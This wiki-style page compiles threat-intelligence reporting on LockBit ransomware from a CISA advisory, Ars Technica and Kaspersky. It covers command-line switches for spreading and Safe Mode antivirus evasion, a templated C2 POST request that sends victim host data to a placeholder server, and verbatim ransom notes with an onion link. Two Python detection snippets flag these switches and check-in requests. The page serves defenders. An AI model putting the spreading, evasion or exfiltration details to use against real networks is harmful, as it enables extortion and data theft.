LockBit: Difference between revisions

Revision as of 07:09, 13 May 2023

Cybersecurity & Infrastructure Security Agency (2023)

LockBit 3.0, also known as "LockBit Black", is more modular than its previous versions. LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify its behavior.

LockBit command line parameters:

* -pass (32 character value) : Password used to launch LockBit 3.0, required.
* -path (file or path) : Only encrypts the provided file or folder
* -gspd : Spread via group policy
* -psex : Spread via admin shares
* -safe : Reboot host into Safe Mode, to circumvent endpoint antivirus and detection
* -wall : Sets LockBit 3.0 wallpaper and prints out the LockBit 3.0 ransom note
* -del : Self-delete after successful ransom payment
* -gdel : Remove LockBit 3.0 group policy changes after successful ransom payment

The password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware. Because the code is unexecutable and unreadable in its encrypted form, protecting it in this manner hinders malware detection and analysis. Signature-based detections may fail to detect the LockBit 3.0 executable, as the executable's encrypted portion will vary with the cryptographic key used for encryption.
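As an added detection-side example (not code from CISA, this page, or any vendor product), the following Python triages constructed process-creation records for the LockBit 3.0 argument pattern listed above; the file paths, the record format and the 32-character value are assumptions, not real indicators.

```python
"""Added example for this page (not LockBit code or a vendor rule): matches the
LockBit 3.0 switches listed above against constructed process-creation records."""
import re

# Switches documented above for LockBit 3.0; matched only as standalone tokens,
# so "del" inside 'cmd.exe /c "del /q x"' is not a hit.
LOCKBIT_SWITCHES = ("-path", "-gspd", "-psex", "-safe", "-wall", "-del", "-gdel")
SWITCH_RE = re.compile(r"(?:^|\s)(" + "|".join(map(re.escape, LOCKBIT_SWITCHES))
                       + r")(?=\s|$)", re.IGNORECASE)
# "-pass" followed by a 32-character token is mandatory for the sample to run,
# which makes it the most specific signal on a command line.
PASS_RE = re.compile(r"(?:^|\s)-pass\s+(\S{32})(?=\s|$)", re.IGNORECASE)


def assess_cmdline(cmdline: str) -> dict:
    """Return which LockBit-style arguments appear and a coarse verdict."""
    has_pass = PASS_RE.search(cmdline) is not None
    switches = sorted({m.group(1).lower() for m in SWITCH_RE.finditer(cmdline)})
    if has_pass:
        verdict = "high"      # -pass with a 32-char value
    elif len(switches) >= 2:
        verdict = "medium"    # several LockBit switches, no -pass (e.g. truncated log)
    else:
        verdict = "low"
    return {"pass_arg": has_pass, "switches": switches, "verdict": verdict}


# Constructed process-creation records; paths, names and the 32-char value are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\LB3.exe",
     "cmdline": "LB3.exe -pass 0123456789abcdef0123456789abcdef -gspd -psex -wall"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "del /q report.tmp"'},
    {"image": r"C:\Temp\svc.exe", "cmdline": "svc.exe -safe -del"},
]


def triage(events) -> list:
    """Return (image, verdict, switches) for every record that is not 'low'."""
    hits = []
    for ev in events:
        res = assess_cmdline(ev["cmdline"])
        if res["verdict"] != "low":
            hits.append((ev["image"], res["verdict"], res["switches"]))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```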

LockBit 3.0 will only infect machines whose language settings do not match a defined exclusion list. However, whether the system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria) and Tatar (Russia). If a language from the exclusion list is detected, LockBit 3.0 will stop execution without infecting the system.

Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via phishing campaigns, abuse of valid accounts, exploitation of public-facing applications, external remote services[1] and drive-by compromise[2].

Ransom note

~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.

Communication to the command center server

If configured, LockBit 3.0 will send two HTTP POST requests to one of the command center servers. Information about the victim host and bot is encrypted with an AES key and base64-encoded.

POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive

LIWy=RJ51lB5GM&a4OuN=<Lockbit ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in the encrypted data:

{
  "bot_version": "X",
  "bot_id": "X",
  "bot_company": "X",
  "host_hostname": "X",
  "host_user": "X",
  "host_os": "X",
  "host_domain": "X",
  "host_arch": "X",
  "host_lang": "X",
  "disks_info": [
    {
      "disk_name": "X",
      "disk_size": "XXXX",
      "free_size": "XXXXX"
    }
  ]
}
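As an added analyst-side example (not the malware's code and not from the advisory), the following Python parses a check-in request shaped like the one above and flags the parameter whose value looks like the AES-encrypted, base64-encoded blob; the host, the bot id, the blob and the "decodes to whole 16-byte blocks" heuristic are assumptions, since the page gives the cipher but not the mode.

```python
"""Added example for this page (not the malware's code): pulls the key=value pairs out
of a captured check-in request like the one above and flags values that base64-decode
to whole 16-byte blocks, the shape of an AES-CBC/ECB ciphertext (mode is assumed)."""
import base64
import binascii


def split_pairs(s: str) -> list:
    """Split k=v&k=v without percent-decoding, so '+' and '/' inside base64 survive."""
    return [tuple(item.partition("=")[::2]) for item in s.split("&") if item]


def parse_checkin(raw: str):
    """Return (method, query pairs, body pairs) from a raw HTTP request string."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    _, _, query = target.partition("?")
    return method, split_pairs(query), split_pairs(body.strip())


def looks_like_aes_blob(value: str, min_len: int = 32) -> bool:
    """Valid base64, at least min_len chars, decoding to a multiple of 16 bytes."""
    if len(value) < min_len:
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) % 16 == 0


def flag_candidates(raw: str) -> list:
    """Return [(key, decoded_length)] for parameters that look like AES ciphertext."""
    method, qs_pairs, body_pairs = parse_checkin(raw)
    if method != "POST":
        return []
    return [(k, len(base64.b64decode(v))) for k, v in qs_pairs + body_pairs
            if looks_like_aes_blob(v)]


# Constructed sample modelled on the request above; the host, the bot id and the
# 48-byte "ciphertext" are placeholders, not indicators from any real sample.
FAKE_BLOB = base64.b64encode(bytes(range(48))).decode()
SAMPLE_REQUEST = (
    "POST /?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5 HTTP/1.1\r\n"
    "Content-Type: text/plain\r\nUser-Agent: Safari/537.36\r\n"
    "Host: c2.example.invalid\r\nConnection: Keep-Alive\r\n\r\n"
    f"LIWy=RJ51lB5GM&a4OuN=BOTID-PLACEHOLDER&wQadZP={FAKE_BLOB}&Xni=AboZOXwUw"
)

if __name__ == "__main__":
    print(flag_candidates(SAMPLE_REQUEST))   # [('wQadZP', 48)]
```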

Ars Technica (2020)

Dan Goodin (2020), "LockBit, the new ransomware for hire: A sad and cautionary tale", Ars Technica

Claims:

  • ARP tables, server message block, PowerShell encryptor script disguised as a PNG file, onion sites, Jabber
  • Alleged Russian ties
  • Ransomware as a service, with money-back guarantee

Excerpts

After getting in, LockBit used a dual method to map out and infect the victimized network. First, the ARP tables, which map IP addresses to device MAC addresses, helped to locate accessible systems. Second, server message block, a protocol used for sharing files and folders among networked machines, allowed the infected nodes to connect to uninfected ones. LockBit would then execute a PowerShell script that spread the ransomware to those machines. The malicious file the PowerShell script downloaded was disguised as a PNG image. In fact, it was an executable program that encrypted the files on the machine.

LockBit had another trick. Before the ransomware encrypted data, it connected to an attacker-controlled server and then used the victim's machine IP address to determine where it was located. If it resided in Russia or another country belonging to the Commonwealth of Independent States, it would abort the process.

Once the data was locked up, organization computers were left with a desktop that contained this message as its wallpaper.

All your files are encrypted by LockBit. For more information, see Restore-My-Files.txt that is located in every encrypted folder

The ransomware note looked like this.

All your important files are encrypted!
Any attempts to restore your files with the thrid-party [sic] software will be fatal for your files!
RESTORE YOU [sic] DATA POSIBLE [sic] ONLY BUYING private key from us.
There is only one way to get your files back:

| 1. Download Tor browser and install it.
| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?E3D94FA5
| 3. Follow the instructions on this page

### Attention! ###
# Do not rename encrypted files.
# Do not try to decrypt using third party software, it may cause permanent data loss.
# Decryption of your files with the help of third parties may cause increased price(they add their fee to our).
# Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN.
# Tor Browser user manual https://tb-manual.torproject.org/about

!!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on.
Don't forget about GDPR.

Using a Tor site, the organization paid the ransom and, after several hours, used the same anonymous service to obtain the decryption key. Those behind this attack had a support desk that communicated over the anonymized Jabber messenger to resolve several problems the organization had in rebuilding the locked-up network.

LockBit's creators offer a ransomware-as-a-service to customers. LockBit is sold in underground broker forums that often require sellers to put up a deposit that customers can recover in the event the wares don't perform as advertised. In a testament to their confidence and determination, the LockBit sellers have forked out almost $75,000.

Kaspersky

LockBit ransomware - What You need to Know

Claims:

  • Past targets since September 2019 (US, India, Indonesia, Ukraine, France, UK, Germany)
  • Alleged Russian ties
  • Ransomware as a service

Excerpts

Attacks began in September 2019, when it was dubbed the ".abcd virus", a reference to the file extension name used when encrypting a victim's files. Notable past targets include organizations in the United States, India, Indonesia and Ukraine. Additionally, various countries throughout Europe (France, the UK, Germany) have seen attacks. In its automated vetting process, it seems to also intentionally avoid attacking systems local to Russia or to any other countries within the Commonwealth of Independent States.

LockBit functions as ransomware-as-a-service. Willing parties put a deposit down for the use of custom for-hire attacks, and profit under an affiliate framework. Ransom payments are divided between the LockBit developer team and the attacking affiliates, who receive up to 3/4 of the ransom funds.

Notes

  1. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations.
  2. Adversaries gain access to a system through a user visiting a website over the normal course of browsing. Often the website used by an adversary is one frequently visited by a specific community. This kind of targeted campaign is often referred to as a "watering hole attack". Rather than tracking its prey over a long distance, the hunter instead determines where the prey is likely to go, most commonly to a body of water -- the watering hole -- and the hunter waits there. The focus of this technique is to exploit software on a client endpoint upon visiting a website. When a user visits a website, malicious scripts automatically execute, checking the versions of the browser and plugins for a potentially vulnerable version. Upon finding a vulnerable version, exploit code is delivered to the browser. If exploitation is successful, it will give the adversary code execution on the user's system. Meanwhile, adversaries may also use compromised websites to deliver a user to a malicious application designed to steal application access tokens.